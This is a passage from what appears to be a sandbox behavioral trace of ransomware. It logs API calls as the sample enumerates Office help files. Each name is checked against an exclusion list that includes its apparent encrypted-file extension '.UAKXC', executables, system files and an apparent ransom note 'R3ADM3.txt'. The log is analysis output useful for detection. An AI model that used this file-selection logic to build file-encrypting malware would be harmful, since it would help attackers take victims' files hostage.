[0140.664] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.664] StrStrIW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.664] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.664] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.664] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.664] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0140.664] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.664] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.664] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.664] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedda10 [0140.664] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c90 [0140.664] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd7f0 [0140.664] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedda10 | out: hHeap=0xea0000) returned 1 [0140.664] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd988 | out: hHeap=0xea0000) returned 1 [0140.664] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.14.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1 [0140.664] lstrcmpW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2=".") returned 1 [0140.664] lstrcmpW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="..") returned 1 [0140.665] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.665] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.665] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.665] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.665] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.665] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.665] StrStrIW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.665] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.665] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.665] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.665] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.665] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.665] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.665] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.665] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.665] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf68 [0140.665] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee860 [0140.666] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.666] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.666] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.DEV.14.1033.hxn", cAlternateFileName="MSMSAC~2.HXN")) returned 1 [0140.666] lstrcmpW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2=".") returned 1 [0140.666] lstrcmpW (lpString1="MS.MSACCESS.DEV.14.1033.hxn", lpString2="..") returned 1 [0140.666] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.666] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.666] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.666] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.666] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.666] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.666] StrStrIW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.666] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.666] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.666] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.666] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0140.666] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.666] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.666] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.666] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedda10 [0140.666] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef24e8 [0140.667] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0140.667] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedda10 | out: hHeap=0xea0000) returned 1 [0140.667] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd988 | out: hHeap=0xea0000) returned 1 [0140.667] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSOUC.14.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1 [0140.667] lstrcmpW (lpString1="MS.MSOUC.14.1033.hxn", lpString2=".") returned 1 [0140.667] lstrcmpW (lpString1="MS.MSOUC.14.1033.hxn", lpString2="..") returned 1 [0140.667] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.667] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.667] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.667] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.667] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.667] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.667] StrStrIW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.667] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.667] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.667] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.667] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.667] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.667] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.667] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.667] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.668] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2510 [0140.668] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0140.668] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.668] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.668] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.14.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1 [0140.668] lstrcmpW (lpString1="MS.MSPUB.14.1033.hxn", lpString2=".") returned 1 [0140.668] lstrcmpW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="..") returned 1 [0140.668] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.668] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.668] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.668] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.668] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.668] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.668] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.668] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.668] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.668] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.668] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.668] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.668] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.668] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.669] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.669] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2538 [0140.669] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeba8 [0140.669] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.669] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.669] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.DEV.14.1033.hxn", cAlternateFileName="MSMSPU~2.HXN")) returned 1 [0140.669] lstrcmpW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2=".") returned 1 [0140.669] lstrcmpW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="..") returned 1 [0140.669] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.669] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.669] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.669] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.669] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.669] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.669] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.669] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.669] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.669] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.669] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.669] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.670] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.670] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.670] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.670] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2560 [0140.670] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeed10 [0140.670] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.670] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.670] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSTORE.14.1033.hxn", cAlternateFileName="MSMSTO~1.HXN")) returned 1 [0140.670] lstrcmpW (lpString1="MS.MSTORE.14.1033.hxn", lpString2=".") returned 1 [0140.670] lstrcmpW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="..") returned 1 [0140.670] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.670] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.670] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.670] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.670] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.670] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.670] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.670] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.670] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.670] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.671] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.671] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.671] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.671] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.671] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.671] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2588 [0140.671] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeed88 [0140.671] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.671] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.671] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OIS.14.1033.hxn", cAlternateFileName="MSOIS1~1.HXN")) returned 1 [0140.671] lstrcmpW (lpString1="MS.OIS.14.1033.hxn", lpString2=".") returned 1 [0140.671] lstrcmpW (lpString1="MS.OIS.14.1033.hxn", lpString2="..") returned 1 [0140.671] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.671] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.671] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.671] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.671] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.671] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.672] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.672] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.672] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.672] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.672] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.672] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.672] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.672] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.672] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.672] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25b0 [0140.672] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee00 [0140.672] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.672] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.672] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xc997810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc997810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e3ad0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.ONENOTE.14.1033.hxn", cAlternateFileName="MSONEN~1.HXN")) returned 1 [0140.672] lstrcmpW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2=".") returned 1 [0140.672] lstrcmpW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="..") returned 1 [0140.672] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.672] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.672] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.673] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.673] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.673] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.673] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.673] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.673] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.673] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.673] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.673] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.673] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.673] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.673] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.673] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25d8 [0140.673] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee78 [0140.673] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.673] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.673] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2689510, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.14.1033.hxn", cAlternateFileName="MSOUTL~1.HXN")) returned 1 [0140.673] lstrcmpW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2=".") returned 1 [0140.673] lstrcmpW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="..") returned 1 [0140.674] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.674] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.674] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.674] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.674] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.674] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.674] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.674] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.674] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.674] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.674] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.674] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.674] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.674] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.674] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.674] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2600 [0140.674] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeef0 [0140.674] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.675] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.675] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, 